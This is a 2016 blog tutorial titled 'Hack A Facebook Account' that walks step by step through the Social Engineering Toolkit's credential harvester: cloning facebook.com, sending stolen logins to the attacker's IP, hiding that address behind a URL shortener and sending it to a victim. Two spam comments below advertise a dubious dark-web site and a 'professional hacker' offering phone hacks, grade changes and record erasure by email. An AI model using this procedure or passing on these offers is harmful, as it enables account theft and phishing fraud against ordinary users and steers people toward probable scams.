Saturday, 28 May 2016

Hack A Facebook Account Using Kali-Linux (Credential Harvester Attack)


In our previews post we teach you how you can hack facebook password with one fake fb page (phishing). (Create A Facebook Phishing Page : CLICK HERE)

In this tutorial we will use Social Engineering tool i.e Credential Harvester Attack in kali linux.


All you need to do is follow the tutorial as it is to see the Credentials Harvester into the action.

WHAT IS CREDENTIALS HARVESTER ATTACK ?



It is a part of SOCIAL ENGINEERING TOOLKIT. In this method the attack started with a creation of phishing page. Attacker set the post back ip address to receive the credentials like usernames and passwords. The attacker can shorten the ip address to make the ip address looks like a genuine url. When the victim visits the url and feed the login details, the post back feature of the page will send all the data to attacker.

LET'S DO THIS !!!!!!!!!


STEPS:

1. Boot up kali linux on your machine and open terminal.

2. Type this command in the kali linux terminal.
                    
root@kali~# setoolkit

3. Enter 'y' to agree the social engineering toolkit terms and conditions.

4. Select the following options one by one from the menu

'1' (Social Engineering Attacks) then  
'2' (Website Attack Vectors) then
'3' (Credential Harvester Attack) then

5. Type '2' (Site Cloner)

set:webattack> IP address for the post back in 
harvesting:192.168.x.xxx (your ip address)

set:webattack>Enter the url to clone: www.facebook.com

6. Go to  Places > Computer > VAR > WWW and move all the files from www folder to html folder.

7.  Shorten your ip address with tinyurl.com and send it to the victim. When the victim open the link and enter the login details , you will get the username and password in a harvester text file which is located at Places > Computer > VAR > WWW. 

Done !!!

if you face any problem please Comment down below..

& if you like this post please LIKE & SHARE this with your friends

2 comments:

  1. Most of the dark web guide .are scam so we tested this website cash365 live to test if
    it is legit or not.

    ReplyDelete
  2. This professional hacker is absolutely reliable and I strongly recommend him for any type of hack you require. I know this because I have hired him severally for various hacks and he has never disappointed me nor any of my friends who have hired him too, he can help you with any of the following hacks:

    -Phone hacks (remotely)
    -Credit repair
    -Bitcoin recovery (any cryptocurrency)
    -Make money from home (USA only)
    -Social media hacks
    -Website hacks
    -Erase criminal records (USA & Canada only)
    -Grade change
    -funds recovery

    Email: onlineghosthacker247@ gmail .com

    ReplyDelete